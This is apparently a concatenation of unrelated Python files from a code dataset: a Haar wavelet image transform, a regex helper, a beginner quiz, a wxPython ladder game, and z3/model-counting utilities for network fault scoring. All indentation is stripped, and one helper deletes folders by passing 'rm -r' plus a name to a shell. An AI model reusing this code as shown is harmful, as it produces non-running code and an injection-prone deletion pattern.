j = (int)(i/(N/2))
m = i % (N/2)
ta = j*2*N+2*m
#print(i,j,m,ta)
for j in (0,1,2,3):
haar[4*i+j,ta] = 1
haar[4*i+j,ta+1] = 1*((-1)**j)
if(j == 2 or j ==3):
haar[4*i+j,ta+N] = -1
else:
haar[4*i+j,ta+N] = 1
if(j == 1 or j == 2):
haar[4*i+j,ta+N+1] = -1
else:
haar[4*i+j,ta+N+1] = 1
#生成完了
#print(haar)
#各成分の移動を行列で表現
transport = lil_matrix((N*N,N*N))
for a in (0,1):
for i in range(int(height/2)):
for j in (0,1):
for k in range(int(width/2)):
#print(a,i,j,k)
x = k + (i*height) + j*(int(height/2)) + a*(height*(int(width/2)))
y = k * 4 + j + 2*a + i*width*2
#print(x,y)
transport[x,y] = 1
#print(transport)
#csr_matirixに変換 計算効率が向上するらしい
haar = haar.tocsr()
transport = transport.tocsr()
#transportとhaarの積が実際の変換行列となる
change_matrix = haar/4
#change_matrix = (transport * haar)/4
#print(change_matrix)
#count(段数)乗する
#change_matrix = change_matrix**count
#行列計算、本来は1/4のところを1にしているため計算後1/4する
after_matrix = change_matrix.dot(before_matrix)
#する必要はないが、arrayのほうが好きなのでarrayに変換
after_pixels = after_matrix.getA()
print(after_pixels)
#画像の出力
img2 = Image.new("L",(width,height))
for x in range(height):
for y in range(width):
img2.putpixel((x,y),int(after_pixels[(x*width)+y]))
img2.show()
img2.save("simout.bmp")
"""
#逆変換を行う
inv_matrix = change_matrix.I
after_inv = inv_matrix.dot(after_matrix)
#する必要はないが、arrayのほうが好きなのでarrayに変換
after_pixels = after_inv.getA()
#画像の出力
img3 = Image.new("L",(width,height))
for x in range(height):
for y in range(width):
img3.putpixel((x,y),int(after_pixels[(x*width)+y]))
img3.show()
"""
|
22,073 | 482a0e70c500fa1eb5b883b694c83b082483641e | import re
class HandleRe:
@classmethod
def re_data(cls, re_args, data):
if re.search(r'{no_exist_phone}', data):
result = re.sub(r'{no_exist_phone}', re_args, data)
return result
else:
return data
|
22,074 | 7d9129a6181cb4bf6b99d4ee896459a534921add | def checklist2():
value = raw_input("Did you call/use/run this function by typing its name? (y/n)")
if value == 'y':
print "Good"
else:
print "Well, get to it then!"
return
value1 = raw_input("Did you put the ( character after the name to run it? (y/n)")
if value1 == 'y':
print "Awesome"
else:
print "Get crackin'"
return
value2 = raw_input("Did you put the values you want into the parenthesis separated by commas? (y/n)")
if value2 == 'y':
print "Sweet, keep going."
else:
print "Looks, like you didn't. Go do it."
return
value3 = raw_input("Did you end the function call with a ) character? (y/n)")
if value3 == 'y':
print "Congratulations, you have successfully called a function!"
return
else:
print "You missed the last step, fix it."
return
checklist2()
|
22,075 | d50adb8694cfed2335006797a31b99ec14739303 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2015 SeukWon Kang (kasworld@gmail.com)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# generated by wxGlade 0.6.3 on Sat Dec 5 17:45:08 2009
import wx
import random
# begin wxGlade: extracode
# end wxGlade
class LadderControl(wx.Control):
def __init__(self, *args, **kwds):
wx.Control.__init__(self, *args, **kwds)
self.Bind(wx.EVT_PAINT, self._OnPaint)
self.Bind(wx.EVT_SIZE, self._OnSize)
self.setPlayerNum(10)
def _OnPaint(self, evt):
dc = wx.BufferedPaintDC(self)
dc.SetBackground(wx.Brush("White", wx.SOLID))
dc.Clear()
size = self.GetClientSizeTuple()
unitx, unity = float(
size[0]) / self.playernum, float(size[1]) / self.ladderlen
if not self.showhint:
dc.SetPen(wx.Pen("Black", 2))
for x in range(self.playernum):
dc.DrawLine(
unitx * x + unitx / 2, 0, unitx * x + unitx / 2, size[1])
else:
plpos = range(self.playernum)
for y in range(self.ladderlen + 1):
for x in range(self.playernum):
pl = plpos[x] # 지금 그려야 하는 플레이어.
dc.SetPen(wx.Pen(self.playercolors[pl], 4))
dc.DrawLine(x * unitx + unitx / 2, y * unity - unity /
2, x * unitx + unitx / 2, y * unity + unity / 2)
for x in range(self.playernum):
if y < self.ladderlen and x < self.playernum - 1 and self.steps[y][x]:
plpos[x], plpos[x + 1] = plpos[x + 1], plpos[x]
plpos = range(self.playernum)
for y in range(self.ladderlen + 1):
for x in range(self.playernum):
if y < self.ladderlen and x < self.playernum - 1 and self.steps[y][x]:
plpos[x], plpos[x + 1] = plpos[x + 1], plpos[x]
dc.SetPen(wx.Pen(self.playercolors[plpos[x]], 2))
dc.DrawLine(x * unitx + unitx / 2, y * unity + unity / 2 -
2, (x + 1) * unitx + unitx / 2, y * unity + unity / 2 - 2)
dc.SetPen(wx.Pen(self.playercolors[plpos[x + 1]], 2))
dc.DrawLine(x * unitx + unitx / 2, y * unity + unity / 2 +
2, (x + 1) * unitx + unitx / 2, y * unity + unity / 2 + 2)
def _OnSize(self, evt):
self.Refresh(False)
self.Update()
def setPlayerNum(self, num):
self.showhint = False
self.playernum = num
self.ladderlen = self.playernum * 4
self.makeLadder()
def play(self):
self.showhint = True
self.playercolors = []
for i in range(self.playernum):
self.playercolors.append(
(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255),))
start = range(self.playernum)
for b in self.steps:
for c, pos in zip(b, range(len(b))):
if c:
start[pos], start[pos + 1] = start[pos + 1], start[pos]
# print start
self.playercolors
self.Refresh(False)
return start, self.playercolors
def makeLadder(self):
self.steps = []
for y in range(self.ladderlen):
self.steps.append([])
for x in range(self.playernum - 1):
hbar = random.choice([0, 1])
if hbar and (x >= 1 and self.steps[y][x - 1]) or (y >= 1 and self.steps[y - 1][x]):
hbar = 0
self.steps[y].append(hbar)
class MyFrame(wx.Frame):
def __init__(self, *args, **kwds):
kwds["style"] = wx.DEFAULT_FRAME_STYLE
wx.Frame.__init__(self, *args, **kwds)
self.maxplayernum = 100
self.playernum = 10
self.slider_1 = wx.Slider(
self, -1, self.playernum, 2, self.maxplayernum, style=wx.SL_HORIZONTAL | wx.SL_LABELS)
self.button_1 = wx.Button(self, -1, "Set player num")
self.buttonPlay = wx.Button(self, -1, "Play")
self.playername = []
self.playresult = []
for a in range(self.maxplayernum):
self.playername.append(wx.TextCtrl(self, -1, "p%d" % a))
self.playresult.append(wx.TextCtrl(self, -1, "r%d" % a))
self.laddergrid = LadderControl(self, -1)
self.laddergrid.setPlayerNum(self.playernum)
self.__set_properties()
self.__do_layout()
self.reset_playernum()
self.Bind(wx.EVT_BUTTON, self.btn_setplayernum, self.button_1)
self.Bind(wx.EVT_BUTTON, self.btn_doPlay, self.buttonPlay)
# begin wxGlade: MyFrame.__init__
# end wxGlade
def __set_properties(self):
self.SetTitle("wxLadderGame")
# begin wxGlade: MyFrame.__set_properties
# end wxGlade
def __do_layout(self):
sizer_1 = wx.BoxSizer(wx.VERTICAL)
sizer_4 = wx.BoxSizer(wx.HORIZONTAL)
sizer_4.Add(self.slider_1, 3, wx.EXPAND, 0)
sizer_4.Add(self.button_1, 1, wx.EXPAND, 0)
sizer_4.Add(self.buttonPlay, 1, wx.EXPAND, 0)
sizer_1.Add(sizer_4, 1, wx.EXPAND, 0)
sizer_2 = wx.BoxSizer(wx.HORIZONTAL)
for a in range(self.maxplayernum):
sizer_2.Add(self.playername[a], 1, wx.EXPAND, 0)
sizer_1.Add(sizer_2, 1, wx.EXPAND, 0)
sizer_5 = wx.BoxSizer(wx.HORIZONTAL)
sizer_5.Add(self.laddergrid, 1, wx.EXPAND, 0)
sizer_1.Add(sizer_5, self.playernum * 2, wx.EXPAND, 0)
sizer_3 = wx.BoxSizer(wx.HORIZONTAL)
for a in range(self.maxplayernum):
sizer_3.Add(self.playresult[a], 1, wx.EXPAND, 0)
sizer_1.Add(sizer_3, 1, wx.EXPAND, 0)
self.SetSizer(sizer_1)
sizer_1.Fit(self)
self.Layout()
# begin wxGlade: MyFrame.__do_layout
# end wxGlade
def reset_playernum(self):
for a in range(self.maxplayernum):
self.playername[a].Show(a < self.playernum)
self.playername[a].SetBackgroundColour("White")
self.playername[a].ChangeValue("p%d" % a)
self.playresult[a].Show(a < self.playernum)
self.playresult[a].SetBackgroundColour("White")
self.playresult[a].ChangeValue("r%d" % a)
self.laddergrid.setPlayerNum(self.playernum)
# sizer_1.Fit(self)
self.Layout()
def btn_setplayernum(self, event): # wxGlade: MyFrame.<event_handler>
self.playernum = self.slider_1.GetValue()
self.reset_playernum()
def btn_doPlay(self, event):
result, cols = self.laddergrid.play()
for i in range(self.playernum):
self.playername[i].SetBackgroundColour(cols[i])
self.playresult[i].SetBackgroundColour(cols[result[i]])
pn = self.playername[result[i]].GetValue()
rn = self.playresult[i].GetValue()
if not rn.startswith(pn):
self.playresult[i].ChangeValue("%s:%s" % (pn, rn))
# end of class MyFrame
if __name__ == "__main__":
app = wx.PySimpleApp(0)
wx.InitAllImageHandlers()
frame_1 = MyFrame(None, -1, "")
app.SetTopWindow(frame_1)
frame_1.Show()
app.MainLoop()
|
22,076 | 69845527e8c7d2edca6ad26cd987a273746a4aa3 | import math
from scipy.special import comb
from decimal import *
import time
import pickle
import itertools
import subprocess
import numpy as np
from optparse import OptionParser
from z3 import *
import global_vars as glbl_vars
from Objects import *
from Graph import GenerateSetting
#############
# PROBABILITY
#############
def get_prob_true(p):
r = np.random.choice(2,1,p=[1-p, p])
return r[0]==1
def prob_crash_parameters(e,t,p_crashes=0,k_crashes=0,precision=None,immediatefailure=None):
if precision is not None:
a1=Decimal(comb(e,k_crashes,exact=True))
with localcontext() as ctx:
ctx.prec = precision # Perform a high precision calculation
one = Decimal(1)
e=Decimal(e)
t=Decimal(t)
p_crashes=Decimal(p_crashes)
k_crashes=Decimal(k_crashes)
a = a1*((one-p_crashes)**((e-k_crashes)*t))
if immediatefailure is None:
b=one-((one-p_crashes)**(t))
else:
b=((one-p_crashes)**(immediatefailure))*p_crashes
res = a*(b**k_crashes)
res = +res
return res
else:
a=comb(e,k_crashes,exact=True)*pow(1-p_crashes,(e-k_crashes)*t)
if immediatefailure is None:
b=1-pow(1-p_crashes,t)
else:
b=pow(1-p_crashes,immediatefailure)*p_crashes
return a*pow(b,k_crashes)
def prob_not_AMA(e,t,p_crashes=0,k_crashes=0,k_crashes_sum=None,precision=None):
if precision is not None:
with localcontext() as ctx:
ctx.prec = precision # Perform a high precision calculation
one = Decimal(1)
e=Decimal(e)
t=Decimal(t)
p_crashes=Decimal(p_crashes)
k_crashes=Decimal(k_crashes)
a=(one-p_crashes)**((e-k_crashes)*t)*(p_crashes**k_crashes)
b=(one-p_crashes)**(Decimal(k_crashes_sum))
res = a*b
res = +res
return res
else:
a=pow(1-p_crashes,(e-k_crashes)*t)*pow(p_crashes,k_crashes)
b=pow(1-p_crashes,k_crashes_sum)
return a*b
def get_crash_data(stng, mdl, t, M):
res = []
for e in stng.g.E:
for i in range(t):
if is_true(mdl[stng.vars.crash(e,i)]):
# print 'edge: %s crashed at time %d'%(str(e), i)
res.append((e,i))
break
return res
def get_model_prob(stng,crash_model,t,M,p_crashes=0,k_crashes=0):
dat = get_crash_data(stng,crash_model,t,M)
sum_i = math.fsum([x[1] for x in dat])
return prob_not_AMA(len(stng.g.E),t,
p_crashes=p_crashes,k_crashes=k_crashes,k_crashes_sum=sum_i)
def crashesProbability(stng,M,t,crashed=0,
k_omissions=0,k_crashes=0,k_delays=0,
p_omissions=0,p_crashes=0,p_delays=0,
immediatefailure=None):
'''
Returns the probability that exactly k crashes/delays/omissions occur
'''
checkSupport(k_omissions=k_omissions,k_crashes=k_crashes,k_delays=k_delays)
num_edges = len(stng.g.E)-crashed
return prob_crash_parameters(num_edges,t,immediatefailure=immediatefailure,
p_crashes=p_crashes,k_crashes=k_crashes)
######
# MISC
######
def save_scaling_data_to_file(run,params,rt_dat,prob,filename=None):
n=params['n']
m=params['m']
e=params['e']
t=params['t']
l=params['l']
if filename is None:
filename = 'results/n{}-m{}-e{}-t{}-l{}.dat'.format(n,m,e,t,l)
save_to_file((run,params,rt_dat,prob),filename)
def save_counting_parameters(n,m,e,t,k,l,result):
parameter_file = "timings_counting_bitadder.txt"
line = "{}\t{}\t{}\t{}\t{}\t{}\t{}\n".format(n,m,e,t,k,l,result)
with open(parameter_file, "a") as myfile:
myfile.write(line)
def AskContinue(lb,ub,k):
print "Probability lies in ({},{})".format(lb,ub)
print "Uncertainity = {}".format(ub-lb)
ques="Do you want to continue with k={}".format(k)
print ques
return (ub-lb)>=0.01
return query_yes_no(ques,default="yes")
# Ref : http://code.activestate.com/recipes/577058/
def query_yes_no(question, default="yes"):
"""Ask a yes/no question via input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is True for "yes" or False for "no".
"""
valid = {"yes": True, "y": True, "ye": True,
"no": False, "n": False}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
# sys.stdout.write(question + prompt)
choice = raw_input(question + prompt).lower()
# print(choice)
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' "
"(or 'y' or 'n').\n")
def parse_arguments():
usage = "usage: %prog [options] nodes messages edges timeout l k"
parser = OptionParser(usage=usage)
# parser.add_option('-t','--timeout', dest="t",
# help="The timeout, should be an integer")
# parser.add_option("-l", dest="l",
# help="The guarantee on the number of messages that should arrive.")
# parser.add_option("-k", dest="k",
# help="#edges that are allowed to crash.")
# parser.add_option("-n", dest="n",
# help="#vertices in the network.")
# parser.add_option("-m", dest="m",
# help="#messages in the network.")
# parser.add_option("-e", dest="e",
# help="#edges in the network.")
parser.add_option("-l","--load",
action="store_true", dest="load", default=False,
help="Load setting from pickle-dumped file 'settings.curr'")
parser.add_option("-m","--manual","--custom",
action="store_true", dest="custom", default=False,
help="Load setting from custom file 'custom.settings'")
parser.add_option("-b","--brute",
action="store_false", dest="optimize", default=True,
help="Dont Optimize")
parser.add_option("-v","--verbose",
action="store_true", dest="showProgress", default=False,
help="Dont show progress")
parser.add_option("--nw","--no-weight",
action="store_false", dest="weight", default=True,
help="Choose paths without weights")
parser.add_option("-d","--no-diff",
action="store_true", dest="diff", default=False,
help="Check if schedules generated are different")
parser.add_option("-c","--count",
action="store_true", dest="countFaults", default=False,
help="Count the numer of BAD outcomed fault sequences with at most k crashes")
parser.add_option("-p","--prob",
action="store_true", dest="probabalistic", default=False,
help="Score the forwarding scheme that is generated for the setting")
return parser.parse_args()
def clearFolder(folder):
cmd = "rm -r "+ folder
subprocess.call([cmd],shell=True)
cmd = "mkdir "+ folder
subprocess.call([cmd],shell=True)
def save_to_file(S,filename):
file = open(filename, 'w')
pickle.dump(S, file)
file.close()
def load_from_file(filename):
file = open(filename, 'r')
return pickle.load(file)
def save_priority_to_file(stng, pr, filename):
pr_dict = {}
for v in stng.g.V:
pr_dict[str(v)] = []
for m in pr[v]:
pr_dict[str(v)].append(str(m))
print pr_dict
save_to_file(pr_dict, filename)
def load_priority_from_file(stng, M, filename):
pr_dict = load_from_file(filename)
pr = {}
for v in stng.g.V:
pr[v] = []
for m_name in pr_dict[str(v)]:
pr[v].append(M[int(m_name)])
return pr
def getModel(s):
if s.check() == sat:
return s.model()
else:
return False
def checkSupport(k_omissions=0, k_crashes=0, k_delays=0):
if k_delays > 0:
raise
if k_omissions > 0:
raise
def GeneratePriorities(stng, mdl, M):
'''
Returns (message) priorities such that for every vertex v,
priorities[v] is a list of messages ordered in descending message priority
'''
if not mdl:
return mdl
priorities={}
for v in stng.g.V:
priorities[v]=[]
for m in M:
for v in stng.UFSv[m]:
for i in range(len(M)):
if is_true(mdl[stng.vars.priority(m,v,i)]):
priorities[v].append((i,m))
for v in stng.g.V:
priorities[v] = sorted(priorities[v], key=lambda student: student[0])
priorities[v] = [priorities[v][j][1] for j in range(len(priorities[v]))]
return priorities
def getEdgePriorities(g, FCv, UFSv, M):
'''
Return Edge Priority data from First and Second Path
Return first and second priority edges as:
edge_priority[m][v][0] and edge_priority[m][v][1]
'''
edge_priority = {}
for m in M:
edge_priority[m]= {}
for v in g.V:
edge_priority[m][v] = []
for v in FCv[m]:
edge = g(v,v.nextF(m))
if edge is not None:
edge_priority[m][v].append(edge)
for v in UFSv[m]:
edge = g(v,v.nextS(m))
if edge is not None:
edge_priority[m][v].append(edge)
return edge_priority
# Ref : https://rosettacode.org/wiki/Decimal_floating_point_number_to_binary#Python
def float_dec2bin(d, max_len = 25):
d = float(d)
assert d>0 and d<1
if d in glbl_vars.float_dec2bin_dict.keys():
return glbl_vars.float_dec2bin_dict[d]
hx = float(d).hex()
p = hx.index('p')
bn = ''.join(glbl_vars.hex2bin.get(char, char) for char in hx[2:p])
bin_string = bn.strip('0')
exp = int(hx[p+2:])
assert exp>=len(bin_string.split('.')[0])
prefix = ''.join(['0' for i in range(exp-len(bin_string.split('.')[0]))])
bin_string = prefix + bin_string.split('.')[0] + bin_string.split('.')[1]
if len(bin_string) > max_len:
bin_string = bin_string[:max_len].rstrip('0')
exp = len(bin_string)
glbl_vars.float_dec2bin_dict[d] = (bin_string,exp)
return bin_string,exp
def reduce_precision(p,precision):
if p==0:
return 0
elif p==1:
return 1
bin_str,expo= float_dec2bin(p,max_len=precision)
number = 0
power = 1
for i in range(expo):
power /= 2.0
if bin_str[i] == '1':
number += power
return number
def excludeCrashModel(stng,s,crash_model,t,add_crashes=False,at_t_only=False,
omissions=False,crashes=False,delays=False):
if at_t_only:
begin_time=t
end_time=t+1
else:
begin_time=0
end_time=t
exclude_crashes = []
for e in stng.g.E:
for i in range(begin_time,end_time):
assert ((at_t_only is False) or (i==t))
# omissions
if omissions:
if is_true(crash_model[stng.vars.omit(e,i)]):
exclude_crashes.append(stng.vars.omit(e,i))
else:
exclude_crashes.append(Not(stng.vars.omit(e,i)))
# crashes
if crashes:
if is_true(crash_model[stng.vars.crash(e,i)]):
exclude_crashes.append(stng.vars.crash(e,i))
else:
exclude_crashes.append(Not(stng.vars.crash(e,i)))
# delays
if delays:
if is_true(crash_model[stng.vars.delay(e,i)]):
exclude_crashes.append(stng.vars.delay(e,i))
else:
exclude_crashes.append(Not(stng.vars.delay(e,i)))
if add_crashes:
s.add(And(exclude_crashes))
else:
s.add(Not(And(exclude_crashes)))
def help():
print '''
USAGE:
$ python ScheduleTwoPathCEGAR.py n m e t l k [options]
n Number of Nodes
m Number of Messages
e Number of Edges
t Global timeout
l The minimum number of messages that should reach on time
k The number of edge crashes (Not relevent for scoring forwarding schemes with option --prob)
OPTIONS:
--prob -p Score the forwarding scheme that is generated for the setting
--count -c Count the numer of BAD outcomed fault sequences with at most k crashes
--load -l Load setting from pickle-dumped file 'settings.curr'
--manual -m Load setting from custom text file 'custom.setting'. Explained in detail later
--custom The same as --manual
'''
##########
# PRINTING
##########
def print_dict(d,prefix=''):
try:
for key in d.keys():
print prefix+str(key),'=> ('
print_dict(d[key],prefix=prefix+'\t')
print prefix+')'
except AttributeError:
try:
for i,val in enumerate(d):
print prefix+str(i),'=> ('
print_dict(val,prefix=prefix+'\t')
print prefix+')'
except TypeError:
print prefix+str(d)
def print_edges(stng):
print ''
print ''
for i in range(len(stng.g.E)):
print 'edge',i, str(stng.g.E[i])
print ''
print ''
def print_priorities(stng,M):
'''
print edge priorities
'''
for m in M:
print "Message " + str(m) + " :: {}-->{}".format(str(m.s),str(m.t))
print "------------\n"
for v in stng.UFSv[m]:
print "\tvertex : " + str(v)
for e in stng.edge_priority[m][v]:
print "\t\tEdge "+str(e)
def print_message_priorities(stng,mdl,M):
'''
print edge priorities
'''
pr = GeneratePriorities(stng,mdl,M)
print "\nMESSAGE PRIORITIES"
print "------------------"
for v in stng.g.V:
print "Vertex : " + str(v)
for m in pr[v]:
print "\tMessage "+str(m)
def printProgress(stng, S, M, t, l, k):
low = 0
high = l
rest = 0
mid = (high + low)/2
mdl,s = printProgress(stng, S, M, t, mid,
k_omissions=k_omissions, k_crashes=k_crashes, k_delays=k_delays, returnSolver=True)
while low < high:
#redundant: print 'print progress start iteration', time.time()
if mdl is False:
low = mid+1
rest = mid
else:
high = mid-1
mid = (high + low)/2
s.pop()
s.push()
s.add(Sum([If(stng.vars.config(m.t, m, t), 1, 0) for m in M]) < mid)
if s.check() == sat:
print mid
#redundant: printCounterexample(stng, s.model(), t, M)
mdl = True
else:
rest = mid
mdl = False
#redundant: print 'The schedule is (%d, %d)-resistant'%(rest, k)
def printMessagesInfo(stng, M):
for m in M:
print m.id, '%s --> %s'%(m.s, m.t)
print ', '.join([str(v) for v in stng.FCv[m]])
print ', '.join(['%s --> %s'%(str(v), str(v.nextS(m))) for v in stng.UFSv[m]])
print '################'
lengths = [len(stng.FCe[m]) for m in M]
print 'max length = ', max(lengths), "min length = ", min(lengths)
def printConfiguration(stng, crash_model, t, M, i):
for m in M:
for v in stng.UFSv[m]:
if is_true(crash_model[stng.vars.config(m,v,i)]):
print "{} at vertex {} at time {}".format(m,v,i)
def printConfigurations(stng, crash_model, t, M):
for i in range(t):
print "TIME {}".format(i)
printConfiguration(stng, crash_model, t, M, i)
def printCounterexample(stng, mdl, t, M,count=False):
k_crashes=0
k_omissions=0
k_delays=0
for e in stng.g.E:
for i in range(t):
if is_true(mdl[stng.vars.omit(e,i)]):
if count is False:
print 'edge: %s omitted at time %d'%(str(e), i)
else:
k_omissions += 1
for e in stng.g.E:
for i in range(t):
if is_true(mdl[stng.vars.crash(e,i)]):
if count is False:
print 'edge: %s crashed at time %d'%(str(e), i)
break
else:
k_crashes += 1
break
for e in stng.g.E:
for i in range(t):
if is_true(mdl[stng.vars.delay(e,i)]):
if count is False:
print 'edge: %s delayed at time %d'%(str(e), i)
else:
k_delays += 1
if count is True:
return (k_omissions,k_crashes,k_delays)
def print_time(msg,update=True):
new_time = time.time()
if update:
print msg,new_time,new_time-glbl_vars.last_time
glbl_vars.last_time = new_time
else:
print msg,new_time
return new_time
#############
# DEFINE VARS
#############
def definePriorityVariables(stng, M, heuristic=None, basic_names=False):
'''
Initaializes/defines message priority variables
'''
for m in M:
for v in stng.UFSv[m]:
# message m has priority j at vertex v
for j in range(len(M)):
stng.vars.def_priority(m,v,j,basic_names=basic_names)
if heuristic is not None:
pr = {}
for m in M:
pr[m] = {}
for v in stng.UFSv[m]:
pr[m][v] = Int('priority of {} at vertex {}'.format(str(m),str(v)))
return pr
def defineSimulationVariables(stng, M, t, basic_names=False):
'''
Initiate/Define the following variables for simulating network:
-configuration variables
-used variables
-message arrival variables
-crash variables
-delay variables
-omission variables
'''
for m in M:
for v in stng.UFSv[m]:
# is message m at vertex v at time i
for i in range(t+1):
stng.vars.def_config(m,v,i,basic_names=basic_names)
for e in stng.edge_priority[m][v]:
for i in range(t):
# is message m using e at i
stng.vars.def_used(m,e,i,basic_names=basic_names)
# has message arrived destination
stng.vars.def_msgArrive(m)
for e in stng.g.E:
for i in range(t):
# Is there an omission fault at e at time i
stng.vars.def_omit(e,i,basic_names=basic_names)
# Is there a crash fault at e at time i
stng.vars.def_crash(e,i,basic_names=basic_names)
# Is there a delay fault at e at time i
stng.vars.def_delay(e,i,basic_names=basic_names)
#########
# BOOLEAN
#########
def new_chain_formula(bit_str):
ptr = len(bit_str)-1
if ptr < 0:
raise
chain_form = new_unused_variable()
ptr -= 1
while ptr>=0:
if bit_str[ptr] == '1':
chain_form = Or(chain_form,new_unused_variable())
elif bit_str[ptr] == '0':
chain_form = And(chain_form,new_unused_variable())
else:
raise
ptr -= 1
return chain_form
def new_unused_variable():
var = Bool('new_var'+str(glbl_vars.variable_number))
glbl_vars.variable_number += 1
return var
########
# DIMACS
########
def cnf_to_DIMACS(cnf,record_wv_mapping=False):
'''
Convert cnf formulaoutputted bu z3 into DIMACS Format
'''
glbl_vars.init()
dimacs = [clause_to_DMACS(clause,record_wv_mapping=record_wv_mapping) for clause in cnf]
return dimacs
def clause_to_DMACS(clause,record_wv_mapping=False):
clause = str(clause)
if clause[:3] == "Or(":
clause = clause[3:-1]
dmacs_clause = [literal_to_number(literal,record_wv_mapping=record_wv_mapping) for literal in clause.split(",")]
return dmacs_clause
def literal_to_number(literal,record_wv_mapping=False):
literal=literal.strip(" \t\n")
neg = False
if len(literal) > 5 and literal[:4]=="Not(":
literal = literal[4:-1]
neg = True
literal=literal.strip(" \t\n")
lit_num = None
try:
lit_num = glbl_vars.variable_name_to_number[literal]
except KeyError:
lit_num = glbl_vars.variable_number
glbl_vars.variable_number += 1
glbl_vars.variable_name_to_number[literal] = lit_num
if record_wv_mapping:
if literal[:3] == "WV_":
assert not (literal[3:] in glbl_vars.weight_vars_to_number.keys())
glbl_vars.weight_vars_to_number[literal[3:]] = lit_num
# print 'Set WV -> '+literal[3:]
if neg:
return (-1*lit_num)
else:
return (lit_num)
def save_DIMACS_to_file(dimacs, filename, weight_vars=None, magnification=1):
num_vars = glbl_vars.variable_number-1
num_clauses = len(dimacs)
with open(filename, "w") as f:
header = "p cnf {} {}\n".format(num_vars,num_clauses)
f.write(header)
f.write(''.join([format_DIMACS_clause(clause) for clause in dimacs]))
if weight_vars:
weight_vars_data = []
lit_weights_written = []
for wv in weight_vars:
try:
lit_num = glbl_vars.weight_vars_to_number[wv.name]
# if wv.weight == 0:
# weight_vars_data.append('{} 0\n'.format(-1*lit_num))
# else:
weight_vars_data.append('w {} {}\n'.format(lit_num,wv.weight))
# if wv.weight == 1:
# weight_vars_data.append('{} 0\n'.format(lit_num))
# else:
weight_vars_data.append('w {} {}\n'.format(-1*lit_num,magnification-wv.weight))
lit_weights_written.append(lit_num)
except:
raise
for lit_num in [item for item in range(1,num_vars+1) if item not in lit_weights_written]:
weight_vars_data.append('w {} {}\n'.format(lit_num,1))
weight_vars_data.append('w -{} {}\n'.format(lit_num,1))
f.write(''.join(weight_vars_data))
print ''
print "num_vars =",num_vars
print "num_clauses =",num_clauses
print ''
def format_DIMACS_clause(clause):
formatted = ' '.join([str(lit) for lit in clause])+ " 0\n"
return formatted
########
# WMC
########
def process_approxMC_output(sol_file):
numSols = None
with open(sol_file, "r") as f:
status = 0
for line in f:
if line=="The input formula is unsatisfiable.\n":
numSols=0
break
elif line[:24]=="Number of solutions is: ":
print line[24:-1]
expr = line[24:-1].split('x')
num1 = int(expr[0])
num2 = int(expr[1].split('^')[0])
num3 = int(expr[1].split('^')[1])
numSols = num1*(num2**num3)
if numSols is None:
sys.stderr.write('\n\n'+f.read()+'\n\n')
return 'error'
return numSols
def process_sharpSat_output(sol_file,return_time=False):
numSols = None
time_taken=None
with open(sol_file, "r") as f:
status = 0
for line in f:
if status == 0:
if line=="# solutions \n":
status += 1
elif status == 1:
numSols = int(line)
status += 1
elif status == 2:
assert line=="# END\n"
status += 1
elif status == 3:
assert line =="\n"
status+=1
elif status == 4:
assert line[:6]=="time: "
time_taken=float(line[6:-2])
status+=1
else:
break
assert (status==5)
assert numSols is not None
assert time_taken is not None
if return_time:
return numSols,time_taken
else:
return numSols
def process_weightMC_output(sol_file):
numSols = None
with open(sol_file, "r") as f:
for line in f:
if line=="The input formula is unsatisfiable.\n":
numSols=0
break
elif line[:34]=='Approximate weighted model count: ':
print line[34:-1]
expr = line[34:-1].split('x')
num1 = float(expr[0])
num2 = float(expr[1].split('^')[0])
num3 = float(expr[1].split('^')[1])
numSols = num1*(num2**num3)
if numSols is None:
sys.stderr.write('\n\n'+f.read()+'\n\n')
return 'error'
return numSols
def set_weight_vars(stng, s, M, t,precision=0,
p_omissions=0,p_crashes=0,p_delays=0,magnification=1,output_range = None):
normalization_factor = 1
weight_vars = []
p_omissions1 = reduce_precision(p_omissions,precision)
p_omissions2 = reduce_precision(1/(2-p_omissions),precision)
p_crashes1 = reduce_precision(p_crashes,precision)
p_crashes2 = reduce_precision(1/(2-p_crashes),precision)
if output_range is not None:
original_norm = 1
mag_count = 0
if p_omissions>0:
original_norm *= ((1-p_omissions1)*p_omissions2)**(len(stng.g.E)*t)
mag_count += len(stng.g.E)*t
if p_crashes>0:
original_norm *= ((1-p_crashes1)*p_crashes2)**(len(stng.g.E)*(t-1))
mag_count += len(stng.g.E)*(t-1)
magnification = (output_range*original_norm)**(-1.0/mag_count)
print output_range, original_norm, mag_count, magnification
p_omissions1 = p_omissions1*magnification
p_omissions2 = p_omissions2*magnification
p_crashes1 = p_crashes1*magnification
p_crashes2 = p_crashes2*magnification
for e in stng.g.E:
for i in range(t):
if p_omissions>0:
# Omission weight variables
ors= []
for m in M:
ors.append(stng.vars.used_ex(m,e,i))
used = Or(ors)
omit1 = weight_var(glbl_vars.variable_number,p=p_omissions1)
glbl_vars.variable_number+=1
omit2 = weight_var(glbl_vars.variable_number,p=p_omissions2)
glbl_vars.variable_number+=1
weight_vars.append(omit1)
weight_vars.append(omit2)
s.add(And(used,stng.vars.omit(e,i)) == omit1.var)
s.add(And(Not(used),Not(stng.vars.omit(e,i))) == omit2.var)
normalization_factor *= (magnification-p_omissions1)*p_omissions2
if p_crashes>0:
# Crash Weight Variables
if i==0:
crash1 = weight_var(glbl_vars.variable_number,p=p_crashes1)
glbl_vars.variable_number+=1
weight_vars.append(crash1)
s.add(crash1.var == stng.vars.crash(e,i))
else:
crash1 = weight_var(glbl_vars.variable_number,p=p_crashes1)
glbl_vars.variable_number+=1
crash2 = weight_var(glbl_vars.variable_number,p=p_crashes2)
glbl_vars.variable_number+=1
weight_vars.append(crash1)
weight_vars.append(crash2)
